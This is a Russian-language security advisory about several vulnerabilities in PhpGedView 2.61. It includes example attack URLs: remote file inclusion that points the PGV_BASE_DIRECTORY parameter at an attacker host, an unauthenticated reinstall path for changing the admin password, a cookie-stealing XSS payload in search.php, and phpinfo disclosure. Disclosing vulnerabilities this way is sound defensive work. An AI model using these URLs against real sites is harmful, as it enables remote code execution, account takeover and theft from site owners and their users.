Security Lab

Несколько уязвимостей в PhpGedView

Дата публикации:09.01.2004
Всего просмотров:1527
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: PhpGedView 2.61

Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код команды операционной системы на целевой системе. Удаленный атакующий может выполнить XSS нападение.

Несколько сценариев ('functions.php', 'authentication_index.php', и 'config_gedcom.php') не проверяют переменную "$PGV_BASE_DIRECTORY" перед включением файла. Пример:

 http://[target]/phpgedview_folder/authenti cation_index.php?PGV_BASE_DIRECTORY=http://[attacker]/ 
http://[target]/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker]/ 
http://[target]/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker]/ 
Также сообщается, что файл 'editconfig.php' может использоваться удаленным пользователем для переустановки программного обеспечения и изменения пароля администратора:
 http://[target]/phpgedview_folder/editconfig.php 
Также сообщается, что файл 'search.php' не фильтрует HTML код в данных, представленных пользователем в 'firstname' переменной. Пример:
http://localhost/phpgedview/search.php?action=soundex&firstname="><script >alert(document.cookie)</script> 
Также сообщается, что удаленный пользователь может определить информацию о конфигурации PHP на целевой системе, используя следующий URL:
http://[target]/phpgedview_folder/admin.php?action=phpinfo

URL производителя: http://phpgedview.sourceforge.net/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление см. в источнике сообщения.

Ссылки: Vuln in PHPGEDVIEW 2.61 Multi-Problem